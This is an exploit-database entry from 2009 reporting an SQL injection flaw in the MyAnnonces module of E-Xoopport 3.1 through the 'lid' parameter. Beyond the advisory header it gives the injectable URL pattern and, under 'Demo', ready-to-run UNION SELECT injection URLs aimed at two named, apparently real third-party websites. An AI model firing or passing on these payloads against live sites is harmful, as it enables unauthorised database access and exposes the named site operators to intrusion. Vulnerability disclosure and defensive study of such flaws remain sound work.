E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability

2009-07-20T00:00:00
ID 1337DAY-ID-5522
Type zdt
Reporter Vrs-hCk
Modified 2009-07-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability
==================================================================


================================================================================================

 Title    : Remote SQL Injection Vulnerability
 Software : MyAnnonces Module for E-Xoopport 3.1
 Vendor   : http://www.e-xoopport.it/
 
 Date     : 17 July 2009 (Indonesia)
 Author   : Vrs-hCk

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/modules/MyAnnonces/index.php?pa=viewannonces&lid=[SQLi]

 [-] Demo

     http://www.focolaccia.org/modules/MyAnnonces/index.php?pa=viewannonces&lid=-41' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*
     http://www.annuncisolidali.it/modules/MyAnnonces/index.php?pa=viewannonces&lid=-1946' union select 1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7/*

 ================================================================================================



#  0day.today [2018-04-04]  #